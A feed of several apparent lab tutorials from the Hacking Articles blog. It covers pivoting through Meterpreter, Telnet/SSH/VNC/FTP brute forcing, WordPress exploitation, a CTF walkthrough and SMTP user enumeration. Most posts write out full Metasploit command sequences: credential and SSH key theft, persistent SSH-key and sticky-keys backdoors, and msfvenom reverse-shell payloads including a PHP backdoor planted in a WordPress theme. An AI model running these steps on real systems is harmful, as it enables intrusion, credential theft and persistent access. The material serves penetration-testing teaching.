From given image you can observe two networks interface in pivot’s system 1st for IP 192.168.1.107 through which attacker is connected and 2nd for IP 10.0.0.20 through which telnet server (targets) are connected.

Route Add

Since attacker belongs to 192.168.1.1 interface and target belongs to 10.0.0.0 interface therefore it is not possible to directly make attack on target network until unless the attacker acquires same network connection. In order to achieve 10.0.0.0 network attacker need run the post exploitation “autoroute”.

use post/multi/manage/autoroute 

msf post(autoroute) > set session 1

msf post(autoroute) > exploit

This Module will perform an ARP scan for a given IP range through a Meterpreter Session.

use post/windows/gather/arp_scanner

msf post(arp_scanner) > set rhosts 10.0.0.1-30

msf post(arp_scanner) > set session 1

msf post(arp_scanner) > set thread 20

msf post(arp_scanner) > exploit

 Here we found a new IP 10.0.0.10 as shown in given image. Let’s perform TCP port scan for activated services on this machine.

This module Enumerates open TCP services by performing a full TCP connect on each port. This does not need administrative privileges on the source machine, which may be useful if pivoting.

use auxiliary/scanner/portscan/tcp

msf auxiliary(tcp) > set ports 23

msf auxiliary(tcp) > set rhosts 10.0.0.1

msf auxiliary(tcp) > set thread 10

msf auxiliary(tcp) >exploit

From given you can observe port 23 is open and we know that port 23 is used for telnet service.

Use Telnet login Brute Force Attack

An attacker always tries to make brute force attack for stealing credential for unauthorized access.

This module will test a telnet login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

Now type following command to Brute force TELNET login:

use auxiliary/scanner/telnet/telnet_login

msf auxiliary(telnet_login) > set rhosts 10.0.0.10

msf auxiliary(telnet_login) > set user_file /root/Desktop/user.txt

msf auxiliary(telnet_login) > set pass_file /root/Desktop/pass.txt

msf auxiliary(telnet_login) > exploit

From given image you can observe that TELNET server is not secure against brute force attack because it is showing matching combination of username: aarti and password: 123 for login simultaneously it has opened victims command shell as session 2

Let’s count the number of victim sessions we have hold using following command:

sessions

From given image you can observe there are two sessions 1st as meterpreter session of windows system and 2nd as command shell of telnet server.

sessions 2

Now attacker is command shell of server, let’s verify through network configuration.

Ifconfig

From given you can observe the network IP is 10.0.0.10

 Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Telnet Pivoting through Meterpreter appeared first on Hacking Articles.

Categories: Cyber India

SSH Penetration Testing (Port 22)

Wed, 04/Oct/2017 - 15:20

Probing through every open port is practically the first step hackers take in order to prepare their attack. And in order to work one is required keep their port open but at the same time they are threatened by the fear of hackers. Therefore, one must learn to secure their ports even if they are open.

Requirement

Attacker: kali Linux

Target: ubuntu system (install ssh and putty-tools)

Client: Window systems (install putty and putty genrator)

In this article we will secure SSH port so that even if it’s open no one will be able to exploit it. First of all let’s install SSH server using following command:
sudo apt-get install openssh-server

sudo apt-get install putty-tools

Once the server is installed start SSH service by typing:

service ssh start

To confirm the working of SSH, use the following command:

service ssh status

Configure this port using PUTTY. For configuration in putty, give the IP address in host name along with port number and then select SSH and then finally click on Open.

Upon opening, it will ask for password, give the said password and press enter.

SSH Banner Grabbing

As the service of SSH is started, scan it in your kali using nmap:

nmap -sV 192.168.1.17

Scanning will show that on port 22 is open with the service of SSH.

Type msfconsole to Load metasploit framework and use given below exploit for fetching SSH banner.

auxiliary/scanner/ssh/ssh_version

msf auxiliary(ssh_version) > set rhosts 192.168.1.17

msf auxiliary(ssh_version) > set rport 22

msf auxiliary(ssh_version) > exploit

From given below image you can confirm that it has grab SSH banner.

An attacker always perform enumeration for finding important information such as software version which known as Banner Grabbing and then identify it state of vulnerability against any exploit.

Prevention against Banner Grabbing

As we had discussed above how a banner grabbing can expose loopholes of any software or service running on remote system therefore after installing any service always hide their software versions.

Admin should make following changes in their configuration file to prevent banner information.

  • Open sshd_config file
  • Add a new line “DebianBanner no” as shown in given image.

Save the whole text file after modification as shown in given image. Now it will not disclose banner information and restart the service using following command.

service SSH start

Let’s verify version of running service after hiding banner through nmap version scan.

nmap -p 21 -sV 192.168.1.17

Wonderful!! We are successful in hiding banner which you can confirm from given image.

Exploit SSH through Brute Force Attack

This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

use auxiliary/scanner/ssh/ssh_login

msf auxiliary(ssh_login) >set rhost 192.168.1.17

msf auxiliary(ssh_login) >set rport 22

msf auxiliary(ssh_login) > set userpass_file /root/Desktop/ssh.txt

msf auxiliary(ssh_login) >exploit

Great!! We had not only successfully found valid SSH credential raj: 123 but also got victim command shell session 1 as unauthorized access in target system.

From given below image you can see we have check the victims network interface by executing ifconfig command through session 1.

Now I had executed following command which converted command shell session in to meterpreter session.

sessions -u 1

sessions

Hence you can see here I have owned two sessions 1st for command shell and 2nd for meterpreter.

SSH Connection using PGP Keys

This way we have applied our first measure of security. Now for our second measure of security download and install PUTTY Key Generator. Open it and click on Generate button on low right side.

This will generate a public and private key. Out of these save the private key.

The private key will be saved as shown in following image. You can rename it at convenience as I have named it ssh login key.

Now open terminal of your server and type:

ssh-keygen

The above command will create a folder named .ssh and then create an empty text file with the name authorized_keys in the same folder.

Copy the “ssh login key.ppk” file which are created previously into the .ssh folder.

In the terminal, move into .ssh folder and type the following command:

puttygen –L “ssh login key.ppk”

This command will generate a key. Copy this key in the empty file which we created

This command will generate a key. Copy this key in the empty file which we created earlier with the authorized_keys.

Then in putty configuration tab, go to data and give Auto-login username.

The open SSH>Auth and give the path of SSH login key (private key that was generated).

And then in session tab give the IP address and port number. And then click on open.

It will open without asking for password as you have configured the key.

But this doesn’t mean it can’t be open using password. And still we are vulnerable to hackers.

Exploit SSH by Stealing PGP KEY

If you have already exploited target and have its meterpreter session as exploit above then you can use following post exploit for stealing authorized keys.

This module will collect the contents of all users’ .ssh directories on the targeted machine. Additionally, known_hosts and authorized_keys and any other files are also downloaded. This module is largely based on firefox_creds.rb.

use post/multi/gather/ssh_creds

msf post(ssh_creds) >set session 1

msf post(ssh_creds) >exploit

From given below image you can see we have got all authorized keys store in /.ssh directory now use those keys for login into SSH server.

Create Permanent Backdoor 

This module will add an SSH key to a specified user (or all), to allow remote login via SSH at any time

Use post/linux/manage/sshkey_persistence

msf post(sshkey_persistence) > set session 1

msf post(sshkey_persistence) >exploit

Now whenever host will alive attacker can connect to his system without exploiting again and again due to this permanent backdoor. 

Secure Against SSH PGP key Auto login

Therefore we are going to apply third measure of security i.e. to disable password completely. For this, go to computer>etc>sshd_config.

Here, change password authentication from yes (as shown the image above) to no and uncomment (as shown in image below).

And now that we have successfully applied three measures of security our port is safe from anyone and everyone. To this port the hacker will require physical access to you hardware which is impossible. And if you want to access SSH from another machine then just configure the same key in that PC too and it have access to it.

Prevention against Brute force attack

A threshold account lockout policy in windows which locked an account after certain numbers of attempt that can be possible in UNIX also through Iptables chain rule.

Here admin can set iptable chain rules for certain number of login attempts and if user crossed the define number then account will get locked for some time period as specified by admin.

Type the given below command to set iptable chain rule for account lockout policy:

iptables -I INPUT -p tcp –dport 22 -i eth0 -m state –state NEW -m recent –set

iptables -I INPUT -p tcp –dport 22 -i eth0 -m state –state NEW -m recent  –update –seconds 120 –hitcount 3 -j DROP

Now this above rule will allow only 3 chances for login into FTP server otherwise locked the account for 120 seconds (2 minutes).

service ssh restart

Let’s ensure iptable chain rule working by making brute force attack as above.

Great!! It has prevented by stopping brute force after 3 attempts but will get activated after 2 minute therefore admin should locked the account for long period of time.

Secure SSH through Port Forward

Now that SSH has been configured. We can use our first measure of security i.e. port forwarding. In computer>etc>ssh you will find a file with the name of “sshd_config”.

Open this file and wherever it says port 22, change it to port 2222.

This way we have forwarded SSH service from port 22 to port 2222. Let’s check it on nmap to confirm.

nmap -sV 192.168.1.17

 Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post SSH Penetration Testing (Port 22) appeared first on Hacking Articles.

Categories: Cyber India

VNC Pivoting through Meterpreter

Mon, 02/Oct/2017 - 22:25

In privous article we had describe VNC peneration testing and VNC tunneling through SSH but today we are going to demonstrate VNC pivoting.

From Offensive Security

Pivoting is technique to get inside an unreachable network with help of pivot (centre point). In simple words it is an attack through which attacker can exploit those system which belongs to different network. For this attack, the attacker needs to exploit the main server that helps the attacker to add himself inside its local network and then attacker will able to target the client system for attack.

Lab Setup requirement:

Attacker machine: Kali Linux

Pivot Machine:  ubuntu operating system with two network interface

Target Machine: ubuntu (Allow VNC service)

Exploit pivot machine

Generate payload using msfvenom start multi/handler to hack the pivot machine (ubuntu) read complete article from here and bypass its UAC to achieve admin privileges.

sessions

 From given image you can confirm that I owned pivot machine (192.168.1.226) meterpreter session.

Check network interface through following command:

Meterpreter> ifconfig

From given image you can observe two networks interface in pivot’s system 1st for IP 192.168.1.226 through which attacker is connected and 2nd for IP 10.0.0.1 through which VNC server (targets) are connected.

Route Add

Since attacker belongs to 192.168.1.1 interface and client belongs to 10.0.0.0interface therefore it is not possible to directly make attack on client network until unless the attacker acquires same network connection. In order to achieve 10.0.0.0 network attacker need run the post exploitation “autoroute”.

use post/multi/manage/autoroute 

msf post(autoroute) > set session 3

msf post(autoroute) > exploit

ARP Sweep to identify Active host

This module will enumerate alive Hosts in local network using ARP requests. Take help from target network interface 3 as shown above for MAC address and other details.

 use auxiliary/scanner/discovery/arp_sweep

msf auxiliary(arp_sweep) >set rhost 10.0.0.1-254

msf auxiliary(arp_sweep) >set shost

msf auxiliary(arp_sweep) >set smac 00:0c:29:bf:43:94

msf auxiliary(arp_sweep) >run

 Here we found a new host IP 10.0.0.20 as shown in given image. Let’s perform TCP port scan for activated services on this machine.

TCP Port Scan post exploit

This module will enumerate open TCP port of target system.

use auxiliary/scanner/portscan/tcp

msf auxiliary(tcp) > set rhosts 10.0.0.20

msf auxiliary(tcp) > set thread 10

msf auxiliary(tcp) >exploit

From given you can observe port 5900 is open and we know that 5900 used for VNC services.

VNC brute force attack

In order to steal password for making unauthorized access in VNC machine apply Brute force attack using password dictionary in given below exploit.

use auxiliary/scanner/vnc/vnc_login

msf auxiliary(vnc_login) >set rhosts 10.0.0.20

msf auxiliary(vnc_login) >set pass_file /root/Desktop/pass.txt

msf auxiliary(vnc_login) > run

Awesome!! From given below image you can observe the same password: 123456 have been found by metasploit.

VNC Port forwarding on Local port

Now Type following command for port forwarding on localhost.

 Meterpreter> portfwd add –l  6000 –p 5900 –r 10.0.0.20

-l: This is a local port to listen on.

-p: The remote port to connect on.

-r:  The remote host address to connect on.

Now open the terminal and type following command to connect target machine:

vncviewer 127.0.0.1:6000

Wonderful!! We had successfully exploit VNC client by making unauthorized access.

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

The post VNC Pivoting through Meterpreter appeared first on Hacking Articles.

Categories: Cyber India

VNC tunneling over SSH

Mon, 02/Oct/2017 - 12:07

In previous article we had perform VNC penetration testing and today you will VNC tunneling to connect remote machine with VNC server when they both belongs different network interface.

Basically tunneling is process which allows data sharing or communication between two different networks privately. Tunneling is normally perform through encapsulating the private network data and protocol information inside the public network broadcast units so that the private network protocol information visible to the public network as data. 

Let’s Begin!!

Requiremet:

Server machine(ubuntu):  Two network interface with activted SSH service

Local machine (ubuntu): activated VNC service

Remote machine(window):  with install tight VNC viewer

In following image we are trying to explain VNC tunneling process where a remote PC of IP 192.168.1.225 is trying to connect to 10.0.0.20 which is on INTRANET of another network. To establish connection with local machine, remote PC will create VNC tunnel which will connect with the local system via SSH server machine.

 

Given image below is describing the network configuration for server machine (SSH) where it is showing two IP 192.168.1.226 and another 10.0.0.10 as explain above.

Another image given below is describing network configuration for local machine which is showing IP 10.0.0.20

Checking activated VNC service using following command:

 netstat -tlp

Hence from given image you can see the highlighted text is showing 5900 is enabled in local machine.

Open the terminal and type using following command to connecting to VNC machine (IP: 10.0.0.20) through server machine (IP: 10.0.0.10).

vncviewer 10.0.0.20

Great!! Local machine successfully connected

Similarly Using tight vnc viewer remote machine (192.168.1.225) now trying to connect local machine (IP: 10.0.0.10) as shown in given image

Since they belong to different network therefore he receives network error.

Follow given below step to connect remote machine to local machine via ssh server.

  • Open tightVNC connection and enter the local machine IP: 0.0.20 with port 5900.
  • Enable SSH tunneling
  • Now enter ssh server IP: 168.1.226 with port 22 and ssh server username: ubutnu.

Congrats!!! Remote machine had successfully connected with local machine through VNC.

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

The post VNC tunneling over SSH appeared first on Hacking Articles.

Categories: Cyber India

VNC Penetration Testing (Port 5901)

Sat, 30/Sep/2017 - 17:42

Welcome to Internal penetration testing on VNC server where you will learn VNC installation and configuration, enumeration and attack, system security and precaution.

From Wikipedia

 Virtual Network Computing (VNC) is a graphical desktop sharing system that uses the Remote Frame Buffer protocol (RFB) to remotely control another computer. It transmits the keyboard and mouse events from one computer to another, relaying the graphical screen updates back in the other direction. It uses port 5900: VNC and 5901: VNC-1.

Penetration Lab Requirements

VNC Server: ubuntu

Attacker system: Kali Linux

Client system: window (tightVNC view)

Let’s start!!

VNC Installation

Open the terminal and follow the given below steps by executing given command for VNC installation. 

Given below command will installs the desktop, Unity, as well as several packages that are required for the graphical interface to work properly.

sudo apt-get install gnome-panel gnome-settings-daemon metacity nautilus gnome-terminal

Now type following command for VNC server installation.

sudo apt-get install vnc4server

Given below command will reset your server password that is required for VNC login

sudo vncpasswd

The password should minimum 6 digits; here I had set server password: 098765 for VNC authentication.

Type given below command to run VNC

sudo vncserver :1

It is required to kill the process if you want to make some changes in running VNC server.

sudo vncserver -kill :1

Now type following command in order to open VNC startup file for making some changes.

sudo gedit ~/.vnc/xstartup

Add given below line in startup file as shown in given and save the changes.

exec gnome-session &

exec gnome-panel &

exec  gnome-settings-daemon &

exec metacity &

Execute given below command to set resolution of Desktop screen.

sudo vncserver :1 -geometry 1024×768 -depth 24

After following above 7 steps check service status of VNC server using given below command.

sudo netstat -tnl |grep 5901

From given image you can confirm that port 5901 is activated

Connecting window Client to VNC server

TightVNC is a free remote control software package that help client to connect with VNC server. I have downloaded it in client machine so that he can connect to vnc server.

Run TightVNC Viewer and enter [192.168.1.218:5901] server IP: port number as shown in given image and then click on connect.

Client will get VNC authentication Popup enter the server password which you have set above.

From given image you can observe that window client has connected to ubuntu server and access his Desktop and could control it mouse and keyboard.

Scanning Target IP for Enumeration

Scanning plays an important role in penetration testing because through scanning attacker make sure which services and open ports are available for enumeration and attack.

Here we are using nmap for scanning port and protocols. 

nmap -sT 192.168.1.218

If service is activated in targeted server then nmap show open STATE for port 5901.

Use nmap script for VNC version

 Following nmap command will Queries a VNC server for its protocol version and supported security types.

nmap -p 5901 –script vnc-info 192.168.1.218

 From given below image you can conclude that it has shown protocol version 3.8 and security type: VNC authentication 2.

Use nmap script for VNC brute force attack

Following nmap command will Performs brute force password auditing against VNC server using dictionary for password.

nmap -p 5901 –script vnc-brute 192.168.1.218 –script-args passdb=/root/desktop/pass.txt

 Great!! From given below image you can read the valid password: 098765

Use Metasploit for VNC brute force attack

This module will test a VNC server on a range of machines and report successful logins. Currently it supports RFB protocol version 3.3, 3.7, 3.8 and 4.001 using the VNC challenge response authentication method.

use auxiliary/scanner/vnc/vnc_login

msf auxiliary(vnc_login) >set rhosts 192.168.1.218

msf auxiliary(vnc_login) >set rport 5901

msf auxiliary(vnc_login) >set pass_file /root/Desktop/pass.txt

msf auxiliary(vnc_login) > run

Awesome!! From given below image you can observe the same password: 098765 have been found by metasploit.

Attacker connecting VNC server

Open a new terminal and type following command for connecting with VNC server using above password 098765

vncviewer 192.168.1.218:5901

Nice!! You can see after making successfully brute force attack an attacker can easily connect with vnc server.

Capture VNC Session of window Remote system using Msfvenom

Create a VNC payload using msfvenom and try to achieve VNC shell of victim’s PC.

Open the terminal in your Kali Linux and type following command to generate a VNC payload using msfvenom command.

msfvenom -p windows/vncinject/reverse_tcp lhost=192.168.1.216 lport=44455 -f exe > /var/www/html/vnc.exe

 Now the above command will generate an exe file for the VNC payload in /var/www/html of Kali Linux.

Being an attack you need to send this backdoor to the target and start multi handler in the metasploit framework.

msfconsole

use exploitmulti/handler

msf exploit(handler) > set payload windows/vncinject/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.216

msf exploit(handler) > set lport 4455

msf exploit(handler) > set viewonly false

msf exploit(handler) > run

Now attacker tries to connect with target using VNC payload, from given screenshot you can see it has launched vncviewer and we have our session 1 is running at background.

Here you can see desktop screen of victim’s pc through will attacker is connected.

Another way to Capture VNC Session of window Remote system

Suppose you have already exploited any window system and got victim’s system reverse connection through meterpreter session. 

Type given below command which will inject a VNC Dll via a reflective loader (staged). Connect back to the attacker.

Meterpreter > run vnc

Great!! Again attacker is connected to victim’s system

Secure VNC server through port forwarding

Open vnserver setup file using given blow command:

sudo gedit /usr/bin/vncserver

Follow given below step for making changes

Add # to comment “vncport = 5900” 

Add a new line as shown in given image for forwarding VNC service as vncPort = 8800;

Now try to connect with vnc server through port 8800 as connected above through tighvnc viewer and enter the password.

Hence you can see the vnc connection has been established successfully.

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

The post VNC Penetration Testing (Port 5901) appeared first on Hacking Articles.

Categories: Cyber India

FTP Pivoting through RDP

Fri, 29/Sep/2017 - 22:17

In our previous tutorial we had discussed on SSH pivoting & RDP pivoting and today you will learn FTP pivoting attack.

From Offensive Security

Pivoting is technique to get inside an unreachable network with help of pivot (centre point). In simple words it is an attack through which attacker can exploit those system which belongs to different network. For this attack, the attacker needs to exploit the main server that helps the attacker to add himself inside its local network and then attacker will able to target the client system for attack.

Lab Setup requirement:

Attacker machine: Kali Linux

Pivot Machine:  window operating system with two network interface

Target Machine: window 7 (Allow FTP service)

Exploit pivot machine

Use exploit MS17-010 or multi handler to hack the pivot machine and bypass its UAC to achieve admin privileges.

sessions

 From given image you can confirm that I owned pivot machine (192.168.0.101) meterpreter session1.

Launch sticky key attack 

Here I need to make post exploit to launch sticky key attack 

Use post/windows/manage/sticky_keys

msf post(sticky_keys) > set session 1

msf post(sticky_keys) >exploit

Great!! It has successfully launched sticky attack in pivot machine and now we will utilize it later for establishing connection with target FTP server.

Enable RDP service

Open meterpreter session1 and type following command which will enable remote Desktop service in pivoted machine. 

Meterpreter> run getgui -e

Verify network interface of pivot

Check network interface through following command:

Meterpreter> ifconfig

From given image you can observe two networks interface in pivot’s system 1st for IP 192.168.0.101 through which attacker is connected and 2nd for IP 192.168.100.102 through which FTP server (targets) are connected.

Use autoroute post exploit

Since attacker belongs to 192.168.0.1 interface and client belongs to 192.168.100.0 interface therefore it is not possible to directly make attack on client network until unless the attacker acquires same network connection. In order to achieve 192.168.100.0 network attacker need run the post exploitation “autoroute”.

This module manages session routing via an existing Meterpreter session. It enables other modules to ‘pivot’ through a compromised host when connecting to the named NETWORK and SUBMASK. Autoadd will search a session for valid subnets from the routing table and interface list then add routes to them. Default will add a default route so that all TCP/IP traffic not specified in the MSF routing table will be routed through the session when pivoting.

use post/multi/manage/autoroute 

msf post(autoroute) > set session 1

msf post(autoroute) > exploit

Use Ping sweep post exploit

This module will perform IPv4 ping sweep using the OS included ping command.

use post/windows/gather/ping_sweep

msf post(ping_sweep) > set rhosts 192.168.100.1-110

msf post(ping_sweep) > set session 1

msf post(ping_sweep) > exploit

 Here we found a new host IP 192.1668.100.103 as shown in given image. Let’s perform TCP port scan for activated services on this machine.

Use TCP Port Scan post exploit

This module Enumerates open TCP services by performing a full TCP connect on each port. This does not need administrative privileges on the source machine, which may be useful if pivoting.

use auxiliary/scanner/portscan/tcp

msf auxiliary(tcp) > set ports 21

msf auxiliary(tcp) > set rhosts 192.168.100.103

msf auxiliary(tcp) > set thread 10

msf auxiliary(tcp) >exploit

From given you can observe port 21 is open and we know that 21 used for FTP services.

FTP Login Brute Force

This module will test FTP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

use auxiliary/scanner/ftp/ftp_login

msf auxiliary(ftp_login) > set rhosts 192.168.100.103

msf auxiliary(ftp_login) > set user_file /root/Desktop/user.txt

msf auxiliary(ftp_login) > set pass_file /root/Desktop/pass.txt

msf auxiliary(ftp_login) > set stop_on_success true

msf auxiliary(ftp_login) > exploit

From given image you can observe t it is showing matching combination of username: raj and password: 123 for login.

Connect to pivot through RDP

Open new terminal in kali Linux and type following command to connect with pivot machine through RDP service

  rdesktop 192.168.0.101

If you remember we had lunched sticky attack above which will open command prompt on logon screen when you will hit 5 times shift key.

Now press 5 times shift key then you will get command prompt and type “start iexplore.exe” which will lunch Internet Explore.

Connect with FTP server

Execute following URL in browser for FTP connection:

ftp://192.168.100.103

 Now enter the credential which we had found through FTP login brute force attack i.e. raj: 123

Congrats!!!  We are successfully connected with FTP server through pivot machine.

 Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post FTP Pivoting through RDP appeared first on Hacking Articles.

Categories: Cyber India

WordPress Penetration Testing using WPScan & Metasploit

Wed, 27/Sep/2017 - 12:51

In our previous article we had discussed “WordPress Penetration Testing Lab Setup in Ubuntu” and today you will learn wordpress penetration testing using WPScan and Metasploit

Attacker: Kali Linux

Target: WordPress 

WPScan is a black box vulnerability scanner for WordPress written in PHP mainly focus on different types of vulnerability in WordPress, WordPress themes, and plugins. Well, WPScan tool is already installed by default in Kali Linux, SamuraiWTF, Pentoo, BlackArch, and BackBox Linux. WPScanuses the database of all the available plugins and themes (approximately over 18000 plugins and 2600 themes) during testing against the target to find outdated versions and vulnerabilities.

Things WPScan can do for you are:

Detect a version of currently installed WordPress.

-Can detect sensitive files like readme, robots.txt, database replacing files, etc.

-Detect enabled features on currently installed WordPress.

-Enumerate theme version and name.

-Detect installed plugins and can tell you if it is outdated or not.

-Enumerate user names also.

Let’s start.

Go to your Kali Linux terminal and type following to download wpscan from git hub.

cd Desktop

git clone https://github.com/wpscanteam/wpscan.git

Now simply type in terminal to run the script:

./wpscan.rb –h

Using default Option we will are going to penetrate our wordpress website:

Scanning wordpress version of target website

Wpscan is a great tool to scan wordpress websites. Now we will try to do some basic scan, we will use enumerate tools to find information about themes, plugins, usernames etc.

Now type following command to scan wordpress and its server:

./wpscan.rb –u http://192.168.0.101/wordpress/

Instead of http://192.168.0.101/wordpress/ type the name of a website you want to scan. 

Here it found server: Apache/2.4.7, PHP /5.5.9 wordpress version 4.8.1, using this information an attacker can check for its exploit in Google. Moreover it also found that the upload directory has directory listing enable which means anyone can browse the directory /wp-content/uploads to view the uploaded files and contents.

Enumerating wordpress Theme

A theme controls the general look and feel of website including things like page layout, widget locations, and default font and color choices. WordPress.com has a wide range of themes for its user and each theme has an about page that includes features and instructions.

To scan installed theme of wordpress website type following command:

./wpscan.rb –u http://192.168.0.101/wordpress/–enumerate t

Enumerating wordpress vulnerable Theme

To scan installed vulnerable theme of wordpress website type following command:

./wpscan.rb –u http://192.168.0.101/wordpress/–enumerate vt

From scanning result we didn’t find any vulnerable theme which means there is no vulnerable theme which can be exploited.

Enumerating wordpress Plugins

Plugins are small piece of code of a program which can be added to a WordPress website to extend its functionality.

To find installed plugins on our target’s WordPress website, type in terminal:

./wpscan.rb –u http://192.168.0.101/wordpress/–enumerate p

Finally, after few seconds, you will get result of installed plug-in. You can see that in my scan result askismet v3.3.3, pixabay-images v2.14, wptouch v3.4.3 such types of installed plug-in are detected. As well as it also describe last update and latest version of that plug-in.

Enumerating wordpress vulnerable Plugins

Now type following command to scan vulnerable plug-in of any wordpress website:

./wpscan.rb –u http://192.168.0.101/wordpress/–enumerate vp

After few seconds, you will get result of installed vulnerable plug-in of website. From given image you can observe that the red color indicates vulnerable plug-ins as well as link of exploits CVE.

Exploit vulnerable plug-in using Metasploit

This module exploits an arbitrary PHP code upload in the WordPress Reflex Gallery version 3.1.3. The vulnerability allows for arbitrary file upload and remote code execution.

Open the terminal load metasploit framework and execute following command:

use exploit/unix/webapp/wp_reflexgallery_file_upload

msf exploit(wp_reflexgallery_file_upload) > set rhost 192.168.0.101

msf exploit(wp_reflexgallery_file_upload) > set targetURI /wordpress/

msf exploit(wp_reflexgallery_file_upload) > exploit

Awesome!! From given image you can observe the meterpreter session of victim’s web server.

meterpreter> sysinfo

Enumerating wordpress Usernames

In order to enumerate user names of wordpress website execute following command:

./wpscan.rb –u http://192.168.0.101/wordpress/–enumerate u

After sometime it will dump the table of usernames. In this scan I had found three users with their Id as given below:

ID 1: admin

ID2: ignite

ID: demo

Enumerate ALL with single command

Whatever we have scanned above can be easily enumerate at once by executing given below command:

./wpscan.rb -u http://192.168.0.101/wordpress/ -e at -e ap -e u

Here we had use option –e at –e ap –e u for following reasons:

–e at : enumerate all themes of targeted website

–e ap: enumerate all plugins of targeted website

–e u: enumerate all usernames of targetd website

Brute force attack using Wpscan

With help of username which we had enumerated above we can create a wordlist of password for user admin and can try brute force login attack using given below command.

./wpscan.rb –u http://192.168.0.101/wordpress/ –wordlist /root/Desktop/dict.txt –username admin

It will start matching the valid combination of username and password for login and then dump the result, from given image you can see it found login credential of targeted website as admin:password.

Generate PHP backdoor in wordpress

You can use above credential for login into admin panel where we can upload any theme, taking advantage of admin right we will try to upload malicious script to achieve reverse connection from victim’s system.

Once you are inside admin panel click on Appearance from dashboard and then select option editor.

Now select template 404.php given on the right side of the frame; after that you will found some php code in middle frame for 404 temperate. Erase the entire php code so that you can add malicious php code for generating backdoor inside website as a new theme.

Now use msfvenom to generate malicious PHP script and type following command.

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f raw

From screenshot you can read the generated PHP script, at this instant we need to copy the text from *<?php……….die();  further we will past it inside wordpress template as a new theme.

Now past above copied PHP text *<?php……….die();   here as new theme under selected  404.php template.

On other hand Load metasploit framework and start multi/handler

use exploit/multi/handler

 msf exploit(handler) >set payload php/meterpreter/reverse_tcp

msf exploit(handler) >set lhost 192.168.0.107

msf exploit(handler) >4444

msf exploit(handler) >exploit

When you will execute your uploaded theme 404.php in browser you will receive reverse connection at multi/handler and get meterpreter session of victim’s system.

http://192.168.0.101/wordpress/wp-content/themes/twentyseventeen/404.php

Here form screenshot you can see through meterpreter we have access victim’s shell.

meterpreter> sysinfo

In this way using WPSCAN and METASPLOIT admin can check the strength and weakness of wordpress website.

AUTHOR: AkshayBhardwaj is a passionate Hacker, Information Security Enthusiast and Researcher | Sketch Artist |Technical writer.

The post WordPress Penetration Testing using WPScan & Metasploit appeared first on Hacking Articles.

Categories: Cyber India

Hack the Primer VM (CTF Challenge)

Tue, 26/Sep/2017 - 13:56

Hello friends! Today we are going to take another CTF challenge known as Primer. The credit for making this vm machine goes to “couchsofa” and it is another boot2root challenge where we have to root the VM to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.115 but you will have to find our own)

netdiscover

Use nmap for port enumeration

nmap -sV  192.168.1.115

We found port 80 is open so we open this ip address in our browser.

We use dirb to list the directories and find robots.txt

dirb http://192.168.1.115/ -w

Inside the robots.txt we find a link to a page.

We open this link, it leads to page that has a story written on it.

We take a look at the source code at the and found another link.

When we open the link, we found a link on the page.

When we open this link, we are prompted for a password.

We capture the request of this page in burpsuite and and send it to repeater. In the response from the server, we find another link.

When we open the link, we find another page that prompts for password.

Now we take a look at the url, it looks like md5 so we removed the first and underscore we find something interesting.

We find that the url are actually prime numbers converted into md5 hashes. We were at the 7 page, and the hash to that is 17. So we convert 19(next prime number) to md5 hash.

To open the it we add “8_” in front of the hash to complete the url. We open it in our browser and find a page.

We take a look at the source code and find another url.

We open it and find a custom made terminal that uses javascript to execute certain commands.

In the ~/usr/falken/ folder we find a hint, when we take a look at the processes we find a command that we need to run.

When we run connect falken@Erebus It prompts for password. We get a hint from the log files that the password might be related to Joshua. In the logs we find that his date of birth i 6th august 1984. We use cupp to create a dictionary file.

We use burpsuite to bruteforce the password, we find that joshua1984 is the password.

When we login, we find a page again with terminal.

We check the files and find a few log files that are encoded. We use the decode command provided by the terminal to decode the files.

There we find our next clue, we googled trivial zero and found it was discovered by Riemann. We use cupp to create a dictionary with the given information.

We use burpsuite to bruteforce the password and find it to be Riemann.

When we login we are again prompted with another terminal.

When we look through the files we find the md5 encoded string for the usernames. We check for processes and again find a command.

When we crack the md5 password, we find that these are password for the respective username.

When we crack the md5 password, we find that these are password for the respective username.

When we login, we are again prompted with another terminal.

Looking through the files we find username, password and hostname.

We use these to login and find a page greeting us the end of the challenge.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

The post Hack the Primer VM (CTF Challenge) appeared first on Hacking Articles.

Categories: Cyber India

4 ways to SMTP Enumeration

Mon, 25/Sep/2017 - 21:34

We can also find out version and valid user of SMTP server using telnet. Execute following command and find out its version and valid user.

Telnet

telnet 192.168.1.107 25

From given image you can observe that it has successfully shown “220 mail.ignite.lab ESMTP Postfix” has been installed on target machine.

You can guess for valid user account through following command and if you receive response code 550 it means unknown user account:

vrfy raj@mail.lab.ignite

If you received message code 250,251,252 which means server has accept the request and user account is valid.

But if you received message code 550 it means invalid user account as shown in given image

vrfy admin@mail.ignite.lab

Metasploit

The SMTP service has two internal commands that allow the enumeration of users: VRFY (confirming the names of valid users) and EXPN (which reveals the actual address of user’s aliases and lists of e-mail (mailing lists)). Through the implementation of these SMTP commands can reveal a list of valid users.

use auxiliary/scanner/smtp/smtp_enum

msf auxiliary(smtp_enum) > set rhosts 192.168.1.107

msf auxiliary(smtp_enum) > set rport 25

msf auxiliary(smtp_enum) > set USER_FILE /root/Desktop/user.txt

msf auxiliary(smtp_enum) > exploit

From given image you can read the valid username found in targeted server as well as it also grab SMTP banner.

smtp-user-enum

